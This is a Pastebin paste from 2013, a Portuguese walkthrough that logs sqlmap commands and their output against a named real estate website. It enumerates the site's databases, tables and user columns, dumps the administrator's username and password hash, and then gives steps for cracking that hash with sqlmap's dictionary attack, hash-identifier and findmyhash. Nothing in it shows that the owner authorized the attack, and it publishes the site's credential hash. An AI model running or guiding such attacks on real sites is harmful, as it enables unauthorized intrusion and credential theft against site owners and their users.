SHARE
TWEET

Sqlmap e Metasploit

a guest May 12th, 2013 981 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 -f -b --current-user --current-db --dbs --is-dba
  3.  
  4. [11:29:15] [INFO] fetching database names
  5. [11:29:15] [INFO] the SQL query used returns 2 entries
  6. [11:29:15] [INFO] resumed: "information_schema"
  7. [11:29:15] [INFO] resumed: "invista_invista"
  8. available databases [2]:                                                                                                    
  9. [*] information_schema
  10. [*] invista_invista
  11.  
  12. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12  --tables -D invista_invista Database: invista_invista
  13. back-end DBMS: MySQL 5
  14. [11:34:09] [INFO] fetching tables for database: 'invista_invista'
  15. [11:34:09] [INFO] the SQL query used returns 10 entries
  16. [11:34:09] [INFO] resumed: "banners"
  17. [11:34:09] [INFO] resumed: "bannersfesta"
  18. [11:34:09] [INFO] resumed: "imoveis_bairro"
  19. [11:34:09] [INFO] resumed: "imoveis_descricao"
  20. [11:34:09] [INFO] resumed: "imoveis_finalidade"
  21. [11:34:09] [INFO] resumed: "imoveis_fotos"
  22. [11:34:09] [INFO] resumed: "imoveis_tipo"
  23. [11:34:09] [INFO] resumed: "newsletter"
  24. [11:34:09] [INFO] resumed: "noticias"
  25. [11:34:09] [INFO] resumed: "usuario"
  26. Database: invista_invista                                                                                                  
  27. [10 tables]
  28. +--------------------+
  29. <PIPE> banners            <PIPE>
  30. <PIPE> bannersfesta       <PIPE>
  31. <PIPE> imoveis_bairro     <PIPE>
  32. <PIPE> imoveis_descricao  <PIPE>
  33. <PIPE> imoveis_finalidade <PIPE>
  34. <PIPE> imoveis_fotos      <PIPE>
  35. <PIPE> imoveis_tipo       <PIPE>
  36. <PIPE> newsletter         <PIPE>
  37. <PIPE> noticias           <PIPE>
  38. <PIPE> usuario            <PIPE>
  39. +--------------------+
  40. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario
  41. [11:37:33] [INFO] the SQL query used returns 2 entries
  42. [11:37:33] [INFO] resumed: "u2_usuario","varchar(255)"
  43. [11:37:33] [INFO] resumed: "u3_senha","varchar(255)"
  44. Database: invista_invista                                                      
  45. Table: usuario
  46. [2 columns]
  47. +------------+--------------+
  48. <PIPE> Column     <PIPE> Type         <PIPE>
  49. +------------+--------------+
  50. <PIPE> u2_usuario <PIPE> varchar(255) <PIPE>
  51. <PIPE> u3_senha   <PIPE> varchar(255) <PIPE>
  52. +------------+--------------+
  53. python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario -C u2_usuario,u3_senha Database : invista_invista
  54. web application technology: PHP 5.2.17
  55. back-end DBMS: MySQL 5
  56. do you want sqlmap to consider provided column(s):
  57. [1] as LIKE column names (default) <--- aceite
  58.  
  59.  
  60. fase aceita dicionario sqlmap
  61. [2] as exact column names
  62. [11:42:38] [INFO] fetching columns like 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
  63. [11:42:38] [INFO] the SQL query used returns 2 entries
  64. [11:42:38] [INFO] resumed: "u2_usuario","varchar(255)"
  65. [11:42:38] [INFO] resumed: "u3_senha","varchar(255)"
  66. [11:42:39] [INFO] fetching entries of column(s) 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'    
  67. [11:42:39] [INFO] the SQL query used returns 1 entries
  68. [11:42:40] [WARNING] reflective value(s) found and filtering out
  69. [11:42:40] [INFO] retrieved: "invista","*1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24"
  70. [11:42:41] [INFO] analyzing table dump for possible password hashes                                                        
  71. recognized possible password hashes in column 'u3_senha'. Do you want to crack them via a dictionary-based attack? [Y/n/q] <---yes
  72. what dictionary do you want to use?
  73. [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter) <---aceita
  74. [2] custom dictionary file
  75. [3] file with list of dictionary files
  76. [11:44:09] [INFO] using default dictionary
  77. [11:44:09] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
  78. do you want to use common password suffixes? (slow!) [y/N] <--- sim
  79. [11:44:39] [INFO] starting dictionary-based cracking (mysql_passwd)
  80. [11:44:39] [INFO] starting 2 processes
  81.                                                                                            
  82. [11:45:09] [INFO] using suffix '12'   passa varias vezes (normal)    
  83. atabase: invista_invista
  84. Table: usuario
  85. [1 entry]
  86. +-------------------------------------------+------------+
  87. <PIPE> u3_senha                                  <PIPE> u2_usuario <PIPE>
  88. +-------------------------------------------+------------+
  89. <PIPE> *1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <PIPE> invista    <PIPE>
  90. +-------------------------------------------+------------+
  91. senhans quase sempre em md5      
  92.  
  93. Para identificar usaremos o hash-identifier :
  94. /pentest/passwords/hash-identifier#
  95. /pentest/passwords/hash-identifier#./hash_id.py
  96.  #########################################################################
  97.    #     __  __                     __           ______    _____           #
  98.    #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
  99.    #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
  100.    #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
  101.    #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
  102.    #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
  103.    #        \/_/\/_/\/__/\/_/\/___/   \/_/\/_/    \/_____/ \/___/ v1.1 #
  104.    #                                                             By Zion3R #
  105.    #                                                    www.Blackploit.com #
  106.    #                                                   Root@Blackploit.com #
  107.    #########################################################################
  108.  
  109.    -------------------------------------------------------------------------
  110.  HASH:  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <-- cole a senha aqui
  111.  
  112. SE NÃO ACHAR USE ESSE PROGRAMA AQUI PRA VER SE QUEBRA
  113. https://code.google.com/p/findmyhash/downloads/detail?name=findmyhash_v1.1.2.py
  114.  
  115. ASSIM
  116. cd Descktop
  117. Desktop#python findmyhash_v1.1.2.py -MD5 -h  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24
  118. se aparecer  que ele ta rachada contegiu
  119.  
  120. obs:apos baixar o programa  clic no  botão direito do mouse e escolha propiedades e escolha permisão
  121. a ultima opção executar como programa
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top